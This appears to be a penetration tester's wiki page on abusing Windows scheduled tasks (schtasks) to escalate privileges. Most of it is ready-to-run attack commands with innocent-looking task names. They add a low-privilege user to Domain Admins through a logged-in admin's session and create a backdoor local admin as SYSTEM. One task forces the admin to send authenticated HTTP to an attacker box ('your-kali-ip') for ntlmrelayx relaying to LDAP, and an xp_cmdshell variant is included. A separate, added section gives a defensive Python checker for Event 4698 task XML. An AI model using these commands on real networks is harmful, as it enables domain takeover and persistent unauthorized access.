# schtasks
Can be used for privesc LOL!  [This article](https://steflan-security.com/windows-privilege-escalation-scheduled-tasks/) covers it pretty well.

## Queue up a scheduled net.exe privesc task by abusing a DA who is logged in interactively
Check who's logged in (and look for a DA):
```
Get-Process -IncludeUserName explorer | Select-Object UserName
```

Queue up the task:

```
schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
```

:::tip
Depending on the Windows system, sometimes you have to reverse the use of single ticks and quotes above, so, for example:
```
schtasks /create /tn "TotallyFineTask" /tr "net group 'Domain Admins' lowpriv /add /domain" /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
```
:::

Run it:
```
schtasks /run /tn "TotallyFineTask"
```

## Queue up a scheduled HTTP-based privesc task by abusing a DA who is logged in interactively
This is handy when you want to coerce a logged-in DA to do an HTTP call to your attacking box so you can relay to LDAP with ntlmrelayx:

```
schtasks /create /tn "TotallyFineNotSus" /tr "powershell.exe IWR http://your-kali-ip -UseDefaultCredentials" /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
```

In another window have something like this going:

```
ntlmrelayx -t ldap://ip.of.a.domaincontroller -debug --escalate-user lowpriv
```

Then fire the schtask!
```
schtasks /run /tn "TotallyFineNotSus"
```

## Queue up a scheduled task when you have NT AUTHORITY\SYSTEM privileges
Sometimes you might land on a box with `NT AUTHORITY\SYSTEM` permissions and have problems running `net.exe` to create a backdoor local admin or add a domain user to a local admin group. In cases like these you can use the scheduled task trick, but this time set `/ru` to `SYSTEM`, like so:

```
schtasks /create /tn "TotallyFineMaintenanceNotABigDeal" /tr "net localgroup administrators SuperSecretLocalAdmin /add" /sc once /st 12:00 /ru SYSTEM /f
```

:::tip
Sometimes escaping single ticks and quotes is hard in xp_cmdshell, so here's another example that works for group shenanigans:
```
EXEC xp_cmdshell 'schtasks /create /tn "DBMaint" /tr "net group \"Domain Admins\" lowpriv /add /domain" /sc once /st 12:00 /ru "domain\a-domain-admin" /it /f';
```
:::
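From the defender's side, every one of the tasks above leaves the same fingerprint in the Task Scheduler XML (the `TaskContent` of Security event 4698, or `schtasks /query /xml`): a task registered by one account that runs as a different principal or as SYSTEM, often with `InteractiveToken` (`/it`), whose action is `net ... /add` or a web request with default credentials. The checker below is an added example, not from the original page; the sample task definitions are constructed and the heuristics are assumptions to tune per environment.

```python
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace, as used in the TaskContent of Security event 4698
# ("A scheduled task was created") and in `schtasks /query /xml` output.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
NET_TOOLS = {"net", "net.exe", "net1.exe"}
# Argument fragments matching the HTTP-coercion one-liner above (assumed heuristics).
WEB_MARKERS = ("invoke-webrequest", "iwr ", "-usedefaultcredentials")

def _text(root, path):
    return (root.findtext(path, default="", namespaces=NS) or "").strip()

def assess_task(task_xml: str) -> list[str]:
    """Return findings for one task definition; an empty list means nothing matched."""
    root = ET.fromstring(task_xml)
    author = _text(root, "t:RegistrationInfo/t:Author").lower()
    run_as = _text(root, "t:Principals/t:Principal/t:UserId").lower()
    logon = _text(root, "t:Principals/t:Principal/t:LogonType")
    command = _text(root, "t:Actions/t:Exec/t:Command").lower().strip('"')
    args = _text(root, "t:Actions/t:Exec/t:Arguments").lower()
    findings = []
    if author and run_as and run_as != author:
        findings.append(f"registered by {author} but runs as {run_as}")
        if logon == "InteractiveToken":
            findings.append("borrows the target user's interactive token (/it)")
    if run_as.rsplit("\\", 1)[-1] == "system":
        findings.append("runs as SYSTEM")
    if command.rsplit("\\", 1)[-1] in NET_TOOLS and "/add" in args:
        findings.append("net.exe adds a user to a group")
    if any(marker in args for marker in WEB_MARKERS):
        findings.append("outbound web request with default credentials")
    return findings

# Constructed sample: the 'net group "Domain Admins" ... /add' task from this page.
SAMPLE_DA_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>DOMAIN\\lowpriv</Author></RegistrationInfo>
  <Principals><Principal id="Author"><UserId>DOMAIN\\a-domain-admin</UserId>
    <LogonType>InteractiveToken</LogonType></Principal></Principals>
  <Actions Context="Author"><Exec><Command>net</Command>
    <Arguments>group "Domain Admins" lowpriv /add /domain</Arguments></Exec></Actions>
</Task>"""
# Constructed sample: a service account running its own backup script (no findings).
SAMPLE_BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>DOMAIN\\svc-backup</Author></RegistrationInfo>
  <Principals><Principal id="Author"><UserId>DOMAIN\\svc-backup</UserId>
    <LogonType>Password</LogonType></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\backup\\nightly.cmd</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml in (("DA task", SAMPLE_DA_TASK), ("benign task", SAMPLE_BENIGN_TASK)):
        print(name, "->", assess_task(xml) or ["no findings"])
```

Feeding real 4698 events in just means pulling the `TaskContent` string out of the event XML and passing it to `assess_task`.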

## Get details on when the task last ran
Tells you when it last ran, error codes, etc:
```
schtasks /query /tn "Sometask" /v /fo LIST
```

## Find all tasks that start with certain characters
For example, if you queued up a bunch of tasks that started with *DB* you could list them with:

```
EXEC xp_cmdshell 'schtasks /query | findstr /i "DB"';
```

## Delete a scheduled task
```
schtasks /delete /TN "MyTaskName" /F
```
